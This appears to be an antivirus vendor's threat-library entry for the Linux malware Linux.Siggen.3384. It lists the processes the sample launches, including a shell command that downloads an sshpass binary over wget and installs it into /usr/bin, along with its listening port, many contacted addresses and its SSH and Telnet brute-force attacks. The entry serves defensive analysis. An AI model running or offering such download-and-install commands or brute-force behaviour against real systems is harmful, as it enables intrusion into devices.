Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Siggen.3384

Added to the Dr.Web virus database: 2020-11-12

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • sh -c sshpass
  • sh -c cd /tmp;wget http://192.168.0.2:8081/mipsapp/sshpass;mv /tmp/sshpass /usr/bin/sshpass
  • wget http://192.168.0.2:8081/mipsapp/sshpass
Network activity:
Awaits incoming connections on ports:
  • 0.0.0.0:7331
Establishes connection:
  • 127.0.0.1:7331
  • 1.#.1.1:53
  • 19#.##8.0.2:8081
Attacks using a special dictionary (brute-force technique) via the SSH protocol
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
Sends data to the following servers:
  • 19#.##8.218.2:80
  • <LOCAL_GATE>:80
  • 19#.##8.218.3:80
  • 19#.##8.218.6:80
  • 19#.##8.218.7:80
  • 19#.##8.218.4:80
  • 19#.##8.218.5:80
  • 19#.##8.218.8:80
  • 19#.##8.218.9:80
  • <LOCAL_GATE>0:80
  • <LOCAL_GATE>1:80
  • <LOCAL_GATE>2:80
  • <LOCAL_GATE>4:80
  • <LOCAL_GATE>3:80
  • <LOCAL_GATE>6:80
  • <LOCAL_GATE>9:80
  • <LOCAL_GATE>5:80
  • <LOCAL_GATE>7:80
  • <LOCAL_GATE>8:80
  • 19#.##8.218.20:80
  • 19#.##8.218.21:80
  • 19#.##8.218.24:80
  • 19#.##8.218.22:80
  • 19#.##8.218.25:80
  • 19#.##8.218.26:80
  • 19#.##8.218.23:80
  • 19#.##8.218.2:8080
  • 19#.##8.218.3:8080
  • 19#.##8.218.6:8080
  • 19#.##8.218.9:8080
  • 19#.##8.218.7:8080
  • 19#.##8.218.8:8080
  • <LOCAL_GATE>7:8080
  • 19#.##8.218.5:8080
  • <LOCAL_GATE>3:8080
  • <LOCAL_GATE>2:8080
  • <LOCAL_GATE>:8080
  • <LOCAL_GATE>4:8080
  • <LOCAL_GATE>1:8080
  • <LOCAL_GATE>9:8080
  • 19#.##8.218.26:8080
  • <LOCAL_GATE>5:8080
  • 19#.##8.218.4:8080
  • 19#.##8.218.23:8080
  • <LOCAL_GATE>8:8080
  • 19#.##8.218.20:8080
  • <LOCAL_GATE>0:8080
  • 19#.##8.218.21:8080
  • 19#.##8.218.24:8080
  • 19#.##8.218.22:8080
  • <LOCAL_GATE>6:8080
  • 19#.##8.218.25:8080
  • 19#.##8.218.28:80
  • 19#.##8.218.30:80
  • 19#.##8.218.29:80
  • 19#.##8.218.31:80
  • 19#.##8.218.34:80
  • 19#.##8.218.37:80
  • 19#.##8.218.33:80
  • 19#.##8.218.36:80
  • 19#.##8.218.27:80
  • 19#.##8.218.32:80
  • 19#.##8.218.35:80
  • 19#.##8.218.38:80
  • 19#.##8.218.39:80
  • 19#.##8.218.40:80
  • 19#.##8.218.31:8080
  • 19#.##8.218.28:8080
  • 19#.##8.218.37:8080
  • 19#.##8.218.34:8080
  • 19#.##8.218.36:8080
  • 19#.##8.218.33:8080
  • 19#.##8.218.32:8080
  • 19#.##8.218.35:8080
  • 19#.##8.218.38:8080
  • 19#.##8.218.40:8080
  • 19#.##8.218.39:8080
  • 19#.##8.218.29:8080
  • 19#.##8.218.27:8080
  • 19#.##8.218.30:8080
  • 19#.##8.218.43:80
  • 19#.##8.218.44:80
  • 19#.##8.218.42:80
  • 19#.##8.218.45:80
  • 19#.##8.218.41:80
  • 19#.##8.218.46:80
  • 19#.##8.218.48:80
  • 19#.##8.218.51:80
  • 19#.##8.218.49:80
  • 19#.##8.218.50:80
  • 19#.##8.218.52:80
  • 19#.##8.218.53:80
  • 19#.##8.218.47:80
  • 19#.##8.218.54:80
  • 19#.##8.218.45:8080
  • 19#.##8.218.43:8080
  • 19#.##8.218.44:8080
  • 19#.##8.218.41:8080
  • 19#.##8.218.42:8080
  • 19#.##8.218.49:8080
  • 19#.##8.218.53:8080
  • 19#.##8.218.48:8080
  • 19#.##8.218.47:8080
  • 19#.##8.218.52:8080
  • 19#.##8.218.46:8080
  • 19#.##8.218.51:8080
  • 19#.##8.218.54:8080
  • 19#.##8.218.50:8080
  • 19#.##8.218.57:80
  • 19#.##8.218.55:80
  • 19#.##8.218.56:80
  • 19#.##8.218.61:80
  • 19#.##8.218.59:80
  • 19#.##8.218.58:80
  • 19#.##8.218.60:80
  • 19#.##8.218.63:80
  • 19#.##8.218.64:80
  • 19#.##8.218.62:80
  • 19#.##8.218.66:80
  • 19#.##8.218.67:80
  • 19#.##8.218.65:80
  • 19#.##8.218.68:80
  • 19#.##8.218.57:8080
  • 19#.##8.218.55:8080
  • 19#.##8.218.56:8080
  • 19#.##8.218.59:8080
  • 19#.##8.218.60:8080
  • 19#.##8.218.63:8080
  • 19#.##8.218.58:8080
  • 19#.##8.218.67:8080
  • 19#.##8.218.66:8080
  • 19#.##8.218.65:8080
  • 19#.##8.218.68:8080
  • 19#.##8.218.64:8080
  • 19#.##8.218.62:8080
  • 19#.##8.218.61:8080
  • 19#.##8.218.57:22
  • 19#.##8.218.56:22
  • 19#.##8.218.55:22
  • 19#.##8.218.63:22
  • 19#.##8.218.60:22
  • 19#.##8.218.59:22
  • 19#.##8.218.61:22
  • 19#.##8.218.64:22
  • 19#.##8.218.66:22
  • 19#.##8.218.58:22
  • 19#.##8.218.62:22
  • 19#.##8.218.68:22
  • 19#.##8.218.67:22
  • 19#.##8.218.65:22
  • 19#.##8.218.69:80
  • 19#.##8.218.70:80
  • 19#.##8.218.71:80
  • 19#.##8.218.76:80
  • 19#.##8.218.74:80
  • 19#.##8.218.73:80
  • 19#.##8.218.72:80
  • 19#.##8.218.75:80
  • 19#.##8.218.77:80
  • 19#.##8.218.78:80
  • 19#.##8.218.79:80
  • 19#.##8.218.81:80
  • 19#.##8.218.80:80
  • 19#.##8.218.82:80
  • 19#.##8.218.74:8080
  • 19#.##8.218.70:8080
  • 19#.##8.218.69:8080
  • 19#.##8.218.78:8080
  • 19#.##8.218.72:8080
  • 19#.##8.218.71:8080
  • 19#.##8.218.79:8080
  • 19#.##8.218.77:8080
  • 19#.##8.218.73:8080
  • 19#.##8.218.75:8080
  • 19#.##8.218.81:8080
  • 19#.##8.218.82:8080
  • 19#.##8.218.80:8080
  • 19#.##8.218.76:8080
  • 19#.##8.218.80:23
  • 19#.##8.218.81:23
  • 19#.##8.218.76:23
  • 19#.##8.218.78:23
  • 19#.##8.218.72:23
  • 19#.##8.218.77:23

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number